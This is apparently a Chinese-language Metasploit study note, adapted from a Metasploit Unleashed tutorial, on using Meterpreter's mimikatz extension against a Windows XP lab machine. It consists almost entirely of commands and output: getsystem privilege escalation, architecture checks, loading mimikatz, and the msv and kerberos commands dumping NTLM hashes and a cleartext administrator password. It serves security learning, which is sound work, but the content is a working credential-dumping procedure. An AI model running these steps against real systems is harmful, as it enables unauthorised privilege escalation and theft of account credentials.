[关闭]
@websec007 2017-04-20T14:02:39.000000Z 字数 2089 阅读 1971

meterprter shell 之 mimikatz

MSF学习笔记

参考连接:https://www.offensive-security.com/metasploit-unleashed/mimikatz/

一、Loading Mimikatz

1、查看当前系统权限

第一步,需要查看当前系统的权限,如果系统权限不是“管理员”或者“system”,则mimikatz模块无法加成成功。因为mimikata的模块在获取用户名密码时,需要最起码是超级管理员权限。

  1. meterpreter > getuid
  2. Server username: WINXP-E95CE571A1\Administrator
  4. meterpreter > getsystem
  5.    got system (via technique 1).
  7. meterpreter > getuid
  8. Server username: NT AUTHORITY\SYSTEM

2、使用sysinfo查询当前系统架构

mimikatz支持32bit 和 64bit Windows架构,在获取system系统权限后,我们需要使用sysinfo命令来查询下当前系统的架构,为选择加载正确的mimikatz做好铺垫。

  1. meterpreter > sysinfo
  2. Computer        : WINXP-E95CE571A1
  3. OS              : Windows XP (Build 2600, Service Pack 3).
  4. Architecture    : x86
  5. System Language : en_US
  6. Meterpreter     : x86/win32

3、 加载mimikatz 到内存中

因为这是一个32位的机器,我们可以继续加载Mimikatz模块到内存。

  1. meterpreter > load mimikatz
  2. Loading extension mimikatz...success.
  4. meterpreter > help mimikatz
  6. Mimikatz Commands
  7. =================
  9.     Command           Description
  10.     -------           -----------
  11.     kerberos          Attempt to retrieve kerberos creds
  12.     livessp           Attempt to retrieve livessp creds
  13.     mimikatz_command  Run a custom commannd
  14.     msv               Attempt to retrieve msv creds (hashes)
  15.     ssp               Attempt to retrieve ssp creds
  16.     tspkg             Attempt to retrieve tspkg creds
  17.     wdigest           Attempt to retrieve wdigest creds

当前版本信息查询

  1. meterpreter > mimikatz_command -f version
  2. mimikatz 1.0 x86 (RC) (Nov  7 2013 08:21:02)

4、从内存中读取Hashes值和Passwords密码

  1. meterpreter > msv
  2. [+] Running as SYSTEM
  3. [*] Retrieving msv credentials
  4. msv credentials
  5. ===============
  7. AuthID   Package    Domain           User              Password
  8. ------   -------    ------           ----              --------
  9. 0;78980  NTLM       WINXP-E95CE571A1  Administrator     lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f }
  10. 0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
  11. 0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
  12. 0;56683  NTLM                                          n.s. (Credentials KO)
  13. 0;999    NTLM       WORKGROUP        WINXP-E95CE571A1$  n.s. (Credentials KO)
  1. meterpreter > kerberos
  2. [+] Running as SYSTEM
  3. [*] Retrieving kerberos credentials
  4. kerberos credentials
  5. ====================
  7. AuthID   Package    Domain           User              Password
  8. ------   -------    ------           ----              --------
  9. 0;999    NTLM       WORKGROUP        WINXP-E95CE571A1$  
  10. 0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     
  11. 0;56683  NTLM                                          
  12. 0;996    Negotiate  NT AUTHORITY     NETWORK SERVICE   
  13. 0;78980  NTLM       WINXP-E95CE571A1  Administrator     SuperSecretPassword
添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注